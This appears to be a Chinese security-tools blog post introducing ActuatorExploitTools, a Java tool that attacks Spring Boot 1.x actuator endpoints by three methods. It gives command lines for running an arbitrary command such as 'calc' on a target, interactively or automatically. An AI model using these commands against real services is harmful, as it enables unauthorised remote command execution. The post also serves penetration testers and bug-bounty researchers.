ActuatorExploit工具

  • A+
所属分类:安全工具

ActuatorExploit工具

ActuatorExploit工具 一款用于攻击spring boot actuator的集成环境,目前集成三种攻击方式,仅支持攻击spring boot 1.x

  • spring cloud bootstrap location
  • jolokia mbeans
  • eureka serviceUrl

工具需要在与目标网络连通的机器上运行,支持交互式攻击和选择Exp自动攻击,交互式攻击适用于众测VPN场景
直接运行即可看到工具说明


java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar


交互式攻击:


java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc


选择Exp攻击:


java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e JolokiaMbean


或者你不想选,可以直接-e All,将会用三种方式攻击


java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e All


自动攻击,对于修改配置的攻击方式会在攻击完成时还原配置,默认还原为空,暂不支持自定义参数

文章来源:
https://github.com/r00tuser111/ActuatorExploitTools

ActuatorExploit工具


推荐文章++++

ActuatorExploit工具

*隐私安全 - 2020五大安全通讯工具

*Weblogic弱密码批量检测工具

*快速收集子域名工具


ActuatorExploit工具

ActuatorExploit工具

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: